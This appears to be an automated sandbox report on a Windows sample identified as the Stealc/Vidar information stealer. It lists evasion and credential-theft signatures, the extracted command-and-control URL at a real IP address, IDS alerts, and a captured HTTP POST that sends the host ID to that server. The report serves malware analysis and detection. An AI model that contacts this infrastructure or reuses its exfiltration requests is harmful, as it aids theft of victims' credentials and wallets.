Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519854
MD5:	b1197df51b22f8d4c9c9e0e552e8a627
SHA1:	01aa572ac1a7f89bdcbbccb757fb0869f232f954
SHA256:	a67b224f6e0df8b93806ed24cd1a09afb539d242add6b52f63600f28b65b3d1d
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7660 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B1197DF51B22F8D4C9C9E0E552E8A627)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1591151333.000000000157C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1400571869.0000000005000000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1591151333.00000000015BB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7660	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7660	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7660	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7660	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.980000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:28:13.822975+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.9	49706	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:28:13.816453+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.9	49706	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:28:14.039345+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.9	49706	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:28:15.167028+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.9	49706	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:28:14.086742+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.9	49706	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:28:13.594142+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.9	49706	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:28:15.883379+0200	2803304	3	Unknown Traffic	192.168.2.9	49706	185.215.113.37	80	TCP
2024-09-27T01:28:21.006831+0200	2803304	3	Unknown Traffic	192.168.2.9	49706	185.215.113.37	80	TCP
2024-09-27T01:28:22.106565+0200	2803304	3	Unknown Traffic	192.168.2.9	49706	185.215.113.37	80	TCP
2024-09-27T01:28:22.752690+0200	2803304	3	Unknown Traffic	192.168.2.9	49706	185.215.113.37	80	TCP
2024-09-27T01:28:23.467266+0200	2803304	3	Unknown Traffic	192.168.2.9	49706	185.215.113.37	80	TCP
2024-09-27T01:28:25.193248+0200	2803304	3	Unknown Traffic	192.168.2.9	49706	185.215.113.37	80	TCP
2024-09-27T01:28:25.696800+0200	2803304	3	Unknown Traffic	192.168.2.9	49706	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 39 35 30 32 45 44 39 31 44 45 33 37 31 32 36 35 39 37 38 32 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="hwid"7C9502ED91DE3712659782------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="build"save------HCGCBFHCFCFBFIEBGHJE--

Source: file.exe, 00000000.00000002.1591151333.000000000155E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1591151333.00000000015BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll0
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dllr
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll8L
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dllH
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dllF
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dllT
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dllZ
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1591151333.00000000015A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll&
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll:
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllh
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1591151333.00000000015A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1591151333.00000000015BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/2M
Source: file.exe, 00000000.00000002.1591151333.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1591151333.00000000015BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1591151333.00000000015A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php5
Source: file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=C
Source: file.exe, 00000000.00000002.1591151333.00000000015BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpainnet
Source: file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpem
Source: file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg
Source: file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpgr
Source: file.exe, 00000000.00000002.1591151333.00000000015A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpi
Source: file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpin
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpirefox
Source: file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpmo
Source: file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpnd9f1
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phprowser
Source: file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpti
Source: file.exe, 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwsApps
Source: file.exe, 00000000.00000002.1591151333.00000000015A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpxC
Source: file.exe, 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1603347094.000000001D74F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1614031262.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp, EGDGIIJJ.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1608618062.0000000029811000.00000004.00000020.00020000.00000000.sdmp, AFIEGCAECGCAEBFHDHIE.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: file.exe, 00000000.00000002.1608618062.0000000029811000.00000004.00000020.00020000.00000000.sdmp, AFIEGCAECGCAEBFHDHIE.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: EGDGIIJJ.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp, EGDGIIJJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp, EGDGIIJJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1608618062.0000000029811000.00000004.00000020.00020000.00000000.sdmp, AFIEGCAECGCAEBFHDHIE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000002.1608618062.0000000029811000.00000004.00000020.00020000.00000000.sdmp, AFIEGCAECGCAEBFHDHIE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: EGDGIIJJ.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: EGDGIIJJ.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: EGDGIIJJ.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AFIEGCAECGCAEBFHDHIE.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: FHJDGHIJDGCBAAAAAFIJDAECGH.0.dr	String found in binary or memory: https://support.mozilla.org
Source: FHJDGHIJDGCBAAAAAFIJDAECGH.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FHJDGHIJDGCBAAAAAFIJDAECGH.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: file.exe, 00000000.00000002.1608618062.0000000029811000.00000004.00000020.00020000.00000000.sdmp, AFIEGCAECGCAEBFHDHIE.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp, EGDGIIJJ.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: EGDGIIJJ.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.1608618062.0000000029811000.00000004.00000020.00020000.00000000.sdmp, AFIEGCAECGCAEBFHDHIE.0.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: FHJDGHIJDGCBAAAAAFIJDAECGH.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: FHJDGHIJDGCBAAAAAFIJDAECGH.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: file.exe, 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: FHJDGHIJDGCBAAAAAFIJDAECGH.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: file.exe, 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1561680361.000000002F9EF000.00000004.00000020.00020000.00000000.sdmp, FHJDGHIJDGCBAAAAAFIJDAECGH.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
